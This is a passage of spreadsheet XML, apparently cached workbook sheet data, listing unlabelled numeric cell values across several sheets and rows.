          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>41.841847826087</v>
          </cell>
          <cell r="V104">
            <v>62.9203664799253</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>32.728548085901</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>8</v>
          </cell>
          <cell r="R107">
            <v>252.45</v>
          </cell>
          <cell r="S107">
            <v>2737.88</v>
          </cell>
          <cell r="T107">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U107">
            <v>45.7336956521739</v>
          </cell>
          <cell r="V107">
            <v>31.954715219421</v>
          </cell>
          <cell r="W107">
            <v>120.25</v>
          </cell>
          <cell r="X107">
            <v>126.793424440483</v>
          </cell>
          <cell r="Y107">
            <v>131.45755109793</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.58</v>
          </cell>
          <cell r="R108">
            <v>260.22</v>
          </cell>
          <cell r="S108">
            <v>2457.07</v>
          </cell>
          <cell r="T108">
            <v>48.25</v>
          </cell>
          <cell r="U108">
            <v>47.1413043478261</v>
          </cell>
          <cell r="V108">
            <v>28.6772875816993</v>
          </cell>
          <cell r="W108">
            <v>128.32469775475</v>
          </cell>
          <cell r="X108">
            <v>132.211205902698</v>
          </cell>
          <cell r="Y108">
            <v>127.931235170345</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.42</v>
          </cell>
          <cell r="R109">
            <v>195.24</v>
          </cell>
          <cell r="S109">
            <v>2990.82999999999</v>
          </cell>
          <cell r="T109">
            <v>47.5833333333333</v>
          </cell>
          <cell r="U109">
            <v>35.3695652173913</v>
          </cell>
          <cell r="V109">
            <v>34.90697945845</v>
          </cell>
          <cell r="W109">
            <v>248.248686514886</v>
          </cell>
          <cell r="X109">
            <v>265.017414464249</v>
          </cell>
          <cell r="Y109">
            <v>270.902057288445</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>11.42</v>
          </cell>
          <cell r="R110">
            <v>201.57</v>
          </cell>
          <cell r="S110">
            <v>2965.63</v>
          </cell>
          <cell r="T110">
            <v>47.5833333333333</v>
          </cell>
          <cell r="U110">
            <v>36.5163043478261</v>
          </cell>
          <cell r="V110">
            <v>34.6128618113912</v>
          </cell>
          <cell r="W110">
            <v>244.30823117338</v>
          </cell>
          <cell r="X110">
            <v>249.476608622315</v>
          </cell>
          <cell r="Y110">
            <v>267.534048414671</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="26">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8316.33</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>89170.472</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>8252</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8044.44</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>65946.66</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>370.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>8078.2</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>3091</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4962.9</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>40035.45</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>3659</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1129.5</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>14163.09</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>1502</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1581.64</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>3669.92</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>367.02</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>311</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1224.326</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>2217.33</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>40.0984375</v>
          </cell>
          <cell r="V101">
            <v>63.0154329608938</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>33.1145135009311</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>40.0984375</v>
          </cell>
          <cell r="V104">
            <v>62.7446112662942</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>32.6371275605214</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>0</v>
          </cell>
          <cell r="R107">
            <v>252.45</v>
          </cell>
          <cell r="S107">
            <v>2737.88</v>
          </cell>
          <cell r="T107">
            <v>0</v>
          </cell>
          <cell r="U107">
            <v>43.828125</v>
          </cell>
          <cell r="V107">
            <v>31.8654562383612</v>
          </cell>
          <cell r="W107">
            <v>0</v>
          </cell>
          <cell r="X107">
            <v>126.793424440483</v>
          </cell>
          <cell r="Y107">
            <v>131.45755109793</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>10.33</v>
          </cell>
          <cell r="R108">
            <v>270.55</v>
          </cell>
          <cell r="S108">
            <v>2467.4</v>
          </cell>
          <cell r="T108">
            <v>43.0416666666667</v>
          </cell>
          <cell r="U108">
            <v>46.9704861111111</v>
          </cell>
          <cell r="V108">
            <v>28.7174115456238</v>
          </cell>
          <cell r="W108">
            <v>145.40174249758</v>
          </cell>
          <cell r="X108">
            <v>132.714840140455</v>
          </cell>
          <cell r="Y108">
            <v>128.004377077085</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.83</v>
          </cell>
          <cell r="R109">
            <v>207.07</v>
          </cell>
          <cell r="S109">
            <v>3002.65999999999</v>
          </cell>
          <cell r="T109">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U109">
            <v>35.9496527777778</v>
          </cell>
          <cell r="V109">
            <v>34.9471601489757</v>
          </cell>
          <cell r="W109">
            <v>309.298393913779</v>
          </cell>
          <cell r="X109">
            <v>267.547206258753</v>
          </cell>
          <cell r="Y109">
            <v>271.053332711663</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>11.83</v>
          </cell>
          <cell r="R110">
            <v>213.4</v>
          </cell>
          <cell r="S110">
            <v>2977.46</v>
          </cell>
          <cell r="T110">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U110">
            <v>37.0486111111111</v>
          </cell>
          <cell r="V110">
            <v>34.6538640595903</v>
          </cell>
          <cell r="W110">
            <v>261.284868977177</v>
          </cell>
          <cell r="X110">
            <v>250.131208997188</v>
          </cell>
          <cell r="Y110">
            <v>267.50921926743</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="27">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6688.78</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>82481.692</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>6559</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>7457.36</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>65048.3</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>154.94</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>7923.26</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>2703</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4830.38</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>37908.07</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>2680</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>915.1</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>15927.99</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>1176</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1556.94</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>3288.98</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>320.54</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>250</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1294.866</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>2197.78</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>38.4945</v>
          </cell>
          <cell r="V101">
            <v>62.8399025069638</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>33.0222725162488</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>38.4945</v>
          </cell>
          <cell r="V104">
            <v>62.5698351903435</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>32.5462163416899</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>0</v>
          </cell>
          <cell r="R107">
            <v>252.45</v>
          </cell>
          <cell r="S107">
            <v>2737.88</v>
          </cell>
          <cell r="T107">
            <v>0</v>
          </cell>
          <cell r="U107">
            <v>42.075</v>
          </cell>
          <cell r="V107">
            <v>31.7766945218198</v>
          </cell>
          <cell r="W107">
            <v>0</v>
          </cell>
          <cell r="X107">
            <v>126.793424440483</v>
          </cell>
          <cell r="Y107">
            <v>131.45755109793</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>8</v>
          </cell>
          <cell r="R108">
            <v>278.55</v>
          </cell>
          <cell r="S108">
            <v>2475.4</v>
          </cell>
          <cell r="T108">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U108">
            <v>46.425</v>
          </cell>
          <cell r="V108">
            <v>28.7302692664809</v>
          </cell>
          <cell r="W108">
            <v>147</v>
          </cell>
          <cell r="X108">
            <v>133.125112188117</v>
          </cell>
          <cell r="Y108">
            <v>128.065767148744</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>9.83</v>
          </cell>
          <cell r="R109">
            <v>216.9</v>
          </cell>
          <cell r="S109">
            <v>3012.48999999999</v>
          </cell>
          <cell r="T109">
            <v>40.9583333333333</v>
          </cell>
          <cell r="U109">
            <v>36.15</v>
          </cell>
          <cell r="V109">
            <v>34.9639043639739</v>
          </cell>
          <cell r="W109">
            <v>294.506612410987</v>
          </cell>
          <cell r="X109">
            <v>268.769017980636</v>
          </cell>
          <cell r="Y109">
            <v>271.129862671744</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>9.83</v>
          </cell>
          <cell r="R110">
            <v>223.23</v>
          </cell>
          <cell r="S110">
            <v>2987.29</v>
          </cell>
          <cell r="T110">
            <v>40.9583333333333</v>
          </cell>
          <cell r="U110">
            <v>37.205</v>
          </cell>
          <cell r="V110">
            <v>34.6714252553389</v>
          </cell>
          <cell r="W110">
            <v>253.102746693795</v>
          </cell>
          <cell r="X110">
            <v>250.262061550867</v>
          </cell>
          <cell r="Y110">
            <v>267.461813215323</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="28">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5560.23</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>76921.462</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>4607</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>7613.98</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>62041.32</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>609.56</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>7313.7</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>4370</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>3923.94</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>38354.13</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1300.7</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>14627.29</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>237</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1779.78</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>1746.2</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>224.06</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>209</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1309.926</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1939.23</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>37.0139423076923</v>
          </cell>
          <cell r="V101">
            <v>62.6653472222222</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>32.9305439814815</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>37.0139423076923</v>
          </cell>
          <cell r="V104">
            <v>62.3960300925926</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>32.4558101851852</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>1.83</v>
          </cell>
          <cell r="R107">
            <v>254.28</v>
          </cell>
          <cell r="S107">
            <v>2739.71</v>
          </cell>
          <cell r="T107">
            <v>7.625</v>
          </cell>
          <cell r="U107">
            <v>40.75</v>
          </cell>
          <cell r="V107">
            <v>31.7096064814814</v>
          </cell>
          <cell r="W107">
            <v>129.508196721311</v>
          </cell>
          <cell r="X107">
            <v>126.812962089036</v>
          </cell>
          <cell r="Y107">
            <v>131.456249019057</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>0</v>
          </cell>
          <cell r="R108">
            <v>278.55</v>
          </cell>
          <cell r="S108">
            <v>2475.4</v>
          </cell>
          <cell r="T108">
            <v>0</v>
          </cell>
          <cell r="U108">
            <v>44.6394230769231</v>
          </cell>
          <cell r="V108">
            <v>28.6504629629629</v>
          </cell>
          <cell r="W108">
            <v>0</v>
          </cell>
          <cell r="X108">
            <v>133.125112188117</v>
          </cell>
          <cell r="Y108">
            <v>128.065767148744</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>9</v>
          </cell>
          <cell r="R109">
            <v>225.9</v>
          </cell>
          <cell r="S109">
            <v>3021.48999999999</v>
          </cell>
          <cell r="T109">
            <v>37.5</v>
          </cell>
          <cell r="U109">
            <v>36.2019230769231</v>
          </cell>
          <cell r="V109">
            <v>34.970949074074</v>
          </cell>
          <cell r="W109">
            <v>228.666666666667</v>
          </cell>
          <cell r="X109">
            <v>267.171314741036</v>
          </cell>
          <cell r="Y109">
            <v>271.003379127517</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>9.67</v>
          </cell>
          <cell r="R110">
            <v>232.9</v>
          </cell>
          <cell r="S110">
            <v>2996.96</v>
          </cell>
          <cell r="T110">
            <v>40.2916666666667</v>
          </cell>
          <cell r="U110">
            <v>37.323717948718</v>
          </cell>
          <cell r="V110">
            <v>34.687037037037</v>
          </cell>
          <cell r="W110">
            <v>239.089968976215</v>
          </cell>
          <cell r="X110">
            <v>249.798196650923</v>
          </cell>
          <cell r="Y110">
            <v>267.370268538786</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="29">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6146.5</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>70774.962</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>5948</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8174.92</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>59814.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>515.66</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>6798.04</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>4289</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4593.1</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>38050.03</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1514.9</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>13112.39</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>1659</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1551.26</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>1853.94</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>317.06</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>268</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1358.986</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1524.5</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>35.6430555555556</v>
          </cell>
          <cell r="V101">
            <v>62.4917590027701</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>32.8393236380425</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
